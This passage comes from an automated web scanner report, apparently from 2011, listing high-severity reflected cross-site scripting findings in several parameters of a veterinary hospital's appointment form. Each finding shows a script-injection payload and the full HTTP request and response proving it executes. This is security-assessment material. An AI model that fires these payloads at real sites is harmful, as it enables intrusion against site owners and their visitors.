GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=15a16"><script>alert(1)</script>b7c615c11f4&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:02 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=e4559his7rbov2pr83025uc590; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="email" id="email" type="text" size="40" maxlength="255" value="15a16"><script>alert(1)</script>b7c615c11f4" />
...[SNIP]...

2.100. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [fname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ff1"><script>alert(1)</script>d1a004b4a7d was submitted in the fname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=21ff1"><script>alert(1)</script>d1a004b4a7d&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:06 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=t6737mmn0l66ej6a3kul5vm5e1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="fname" id="fname" type="text" size="30" class="req" maxlength="50" value="21ff1"><script>alert(1)</script>d1a004b4a7d" />
...[SNIP]...

2.101. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [guid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the guid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55bce"><script>alert(1)</script>8c1dce1f08e was submitted in the guid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=55bce"><script>alert(1)</script>8c1dce1f08e&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=r124nb41s1ua1s8prghmllc3s0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
i" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=55bce"><script>alert(1)</script>8c1dce1f08e&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5
...[SNIP]...

2.102. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ipaddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the ipaddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa1dd"><script>alert(1)</script>20291fa6c4c was submitted in the ipaddress parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243fa1dd"><script>alert(1)</script>20291fa6c4c&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=if1brsa07fop60oc6nosjdjeb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243fa1dd"><script>alert(1)</script>20291fa6c4c&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri
...[SNIP]...

2.103. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [lname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f53d0"><script>alert(1)</script>9b9f80a0f40 was submitted in the lname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=f53d0"><script>alert(1)</script>9b9f80a0f40&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:21 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=j4ue3fobud9ifr9lluj5v6krc2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="lname" id="lname" type="text" size="30" class="req" maxlength="50" value="f53d0"><script>alert(1)</script>9b9f80a0f40" />
...[SNIP]...

2.104. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22281"><script>alert(1)</script>d33a2c5892d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?22281"><script>alert(1)</script>d33a2c5892d=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:45:56 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?22281"><script>alert(1)</script>d33a2c5892d=1" />
...[SNIP]...

2.105. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [optin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e691"><script>alert(1)</script>d26f4a4d140 was submitted in the optin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=9e691"><script>alert(1)</script>d26f4a4d140&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:26 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=5is2j95h7bmhkpu54r12irmp05; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
ls.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=9e691"><script>alert(1)</script>d26f4a4d140&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fww
...[SNIP]...

2.106. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [other parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the other request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a872"><script>alert(1)</script>e5865d0001d was submitted in the other parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

